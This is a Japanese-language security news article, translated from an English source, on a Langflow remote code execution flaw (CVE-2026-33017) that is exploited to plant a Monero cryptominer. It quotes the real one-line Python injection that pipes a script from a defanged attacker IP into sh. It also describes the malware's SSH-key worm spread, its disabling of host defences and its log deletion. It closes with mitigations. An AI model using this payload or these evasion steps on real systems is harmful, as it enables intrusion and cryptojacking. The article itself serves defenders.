Langflowに存在する深刻な認証不要のリモートコード実行(RCE)脆弱性が、CVE-2026-33017として追跡されており、インターネットに露出したAIサーバにMoneroクリプトマイナーを密かに展開する暗号通貨マイニングキャンペーンで積極的に悪用されています。
Trend MicroのTrendAI Researchが報告したこの脆弱性のCVSS v4.0スコアは9.3で、バージョン1.9.0より前のすべてのLangflowに影響します。公開開示からわずか20時間以内に実際の悪用が確認されています。
CVE-2026-33017はPOST /api/v1/build_public_tmp/{flow_id}/flowエンドポイントに存在します。このエンドポイントは攻撃者が制御するcodeフィールドを受け付け、認証なしでサーバのプロセスコンテキスト内で直接Pythonとして評価・実行してしまいます。
さらにリスクを高めているのが、LangflowがデフォルトでAUTO_LOGINを有効にしている点です。これにより、未認証のユーザーでもスーパーユーザートークンを取得し、オンデマンドでパブリックフローを作成できてしまいます。
Langflowがこのクラスのバグをリリースしたのは、1年未満の間で今回が2度目です。最初のケースであるCVE-2025-3248は、2025年6月にFlodrix DDoSボットネットによって同一の手法で悪用されていました。
感染はたった一行のPythonコードの注入から始まります:__import__('os').system('curl hxxp[://]83[.]142[.]209[.]214:8080/isp.sh | sh')
このコードがisp.shというbashドロッパーを取得・実行します。ドロッパーは/var/tmp/.xlamb/に隠し永続化ディレクトリを作成し、メインのマルウェアバイナリlambsys.elfをダウンロードしてバックグラウンドで起動します。
このドロッパーはSSHキー再利用ワームとしても機能します。~/.ssh/known_hostsとエージェントソケットを列挙し、アウトバウンドインターネット接続のないホストでも、SCPプッシュ配信によってSSHで到達可能なすべてのホストへ横方向に伝播します。
コアペイロードであるlambsys.elfはUPXパックされたGoバイナリで、最も古い既知の亜種は2024年5月に遡り、Langflowキャンペーンより22ヶ月前から存在していました。
2026年版ビルドは前バージョンより48%小型化されており、VirusTotalの検出率は31/66からわずか4/66へと大幅に低下しています。これは活発な攻撃者による意図的な検出回避エンジニアリングの結果と見られます。
実行されると、Kinsingを含むWatchDog、Outlaw亜種など39種類の競合クリプトマイナープロセスを名前で終了させ、13の一般的なマイニングプールポートにバインドされたプロセスもすべて停止させます。
さらにホスト防御を組織的に無効化し、AppArmor、SELinux、UFW、iptables、カーネルNMIウォッチドッグ、そしてAlibaba CloudのAliyunセキュリティエージェントを無効にします。これはクラウドホストのAIインフラを意図的に標的としていることを示しています。
また、フォレンジック証拠を消去するために/var/log/syslogを削除し、5分ごとのcronジョブとinit_rmountという名の1分ごとのbashウォッチドッグループによるデュアル永続化をインストールします。
制御を確立した後、lambsys.elfはC2サーバからks.tarをダウンロードしてMD5検証を行い、カスタマイズされたXMRigビルドをprocqという名前で、通常のlsコマンドによる発見を回避するよう設計されたトリプルドットスペースの隠しディレクトリに展開します。
マイナーはTCP/3333経由でプールに接続し、正規のトラフィックに紛れ込むために偽装ユーザーエージェント文字列SystemMonitor/6.25.0を使用します。また、このバイナリは接続前にipinfo.ioを照会してジオゲーティングを実施し、国内の法執行機関との接触を避けるため、攻撃者自身の管轄域にいる被害者を除外します。
Trend Microの研究者は、19日間(2026年3月27日〜4月15日)にわたって脅威アクターの活動を追跡し、偽装UAによる偵察の後にpython-requests/2.25.1ベースの悪用を行うという意図的なパターンを確認しました。
C2 IPアドレス83[.]142[.]209[.]214はSpamhaus DROPブロックリストに掲載されています。このフィードをエグレスファイアウォールで適用している組織であれば、キャンペーン固有の侵害指標を一切使わずにすべてのビーコンをブロックすることが可能です。
注意:IPアドレスおよびドメインは、誤った名前解決やハイパーリンク化を防ぐため、意図的にデファング処理(例:[.])が施されています。MISP、VirusTotal、SIEMなどの管理された脅威インテリジェンスプラットフォーム内でのみ再ファング化してください。
Langflowを運用している組織は、直ちにバージョン1.9.0以降へのアップデート、Langflowインスタンスへの公衆インターネットアクセスの制限、AUTO_LOGIN=falseへの設定変更、そしてサービスが特権アカウントで動作していないかの監査を実施してください。
lambsysのアーティファクトが発見された場合は、単一ホストの侵害としてではなく、SSH鍵の完全な漏洩インシデントとして対処する必要があります。すべてのSSHキーをローテーションし、接続されたすべてのシステムについて横方向移動の痕跡を調査してください。
翻訳元: https://cyberpress.org/langflow-rce-flaw/
